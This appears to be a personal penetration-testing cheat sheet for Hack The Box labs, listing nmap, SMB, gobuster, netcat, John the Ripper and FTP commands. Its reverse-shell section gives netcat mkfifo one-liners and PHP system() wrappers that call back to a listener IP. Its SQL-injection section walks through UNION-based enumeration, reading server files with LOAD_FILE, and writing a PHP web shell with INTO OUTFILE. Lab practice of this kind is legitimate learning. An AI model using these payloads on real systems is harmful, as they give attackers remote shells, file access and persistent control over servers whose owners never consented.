Skip to main content

HTB

nmap

# following is an example of major args - do not run -takes eternity because of -sC
nmap -sV -sC -p- -oA nmap_scan_report <ip_addr>

# -sV Version scan
# -sC Use scripts for more detailed info
# -p- Scan all tcp ports
# -p80 Scan port 80
# -p If -p is not specified then reserved ports 1-1023 are scanned
# --script <script_name>

nmap -sV --open -oA nmap_scan_report <ip_addr>

# --open only return open ports
# -oA report to file

nmap -sC -p 22,80 -oA nmap_scan_report <ip_addr>
# Script scans are intrusive - generally a good idea to run them on specific ports to save time

nmap -sV --script=http-enum -oA nibbles_nmap_http_enum 10.129.42.190
# enumerate common directories using http-enum script

ftp

ftp -p <ip_addr>
# ls
# cd
# get <filename>

snmp

snmpwalk -v 2c -c public <ip_addr> 1.3.6.1.2.1.1.5.0

SMB (Server Message Block)

smbclient -N -L \\\\<ip_addr>
smbclient \\\\<ip_addr>\\users #connection attempt as guest user
smbclient -U bob \\\\<ip_addr>\\users # connection attempt as bob

gobuster

Enumerate directories in a web server

gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt

searchsploit

searchsploit openssh 7.2

netcat

 nc -lvnp 1234  # start listening for connection in port 1234

-l Listen mode, to wait for a connection to connect to us.
-v Verbose mode, so that we know when we receive a connection.
-n Disable DNS resolution and only connect from/to IPs, to speed up the connection.
-p 1234 Port number netcat is listening on, and the reverse connection should be sent to.

nc 10.10.10.1 1234 # connect to remote host port

curl

 curl -s http://ip/users.xml | xmllint  --format -

# curl pretty print xml

reverse shell


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc remote_ip port >/tmp/f

python3 -c 'import pty; pty.spawn("/bin/bash")' #upgrade to interactive tty
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc remote_ip port >/tmp/f"); ?>
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.55 4338 >/tmp/f"); ?>
echo "<?php system (\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.55 4339 >/tmp/f\"); ?>" > r.php

http server (for file sharing)

sudo python3 -m http.server 8080

John the ripper

john -format:RAW-SHA1 -wordlist:rockyou.txt testing.txt

# rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# testing.txt - The password hash

SQL Injection

'  # Input single tick to check for vulnerability
-- Do not forget to end the statement by commenting out the rest of query using dash dash space --

-- Test out the number of columns being projected - Try different numbers
a' UNION SELECT 1, 2, 3 --

-- List tables
a' UNION SELECT 1, TABLE_NAME, TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES --

-- List Columns
a' UNION SELECT 1, 2, COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='user_privileges' --

-- File permission
a' UNION SELECT 1, 2, variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"

-- Current user
a'UNION SELECT 1, 2, USER() --

--Read file
a' UNION SELECT 1, LOAD_FILE("/var/www/html/index.php"), 3, 4 --

-- Write file
a' UNION SELECT "","",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/dashboard/shell.php'--

File Transfer

ftp server

sudo pip3 install pyftpdlib                            # Install
sudo python3 -m pyftpdlib --port 21 # Run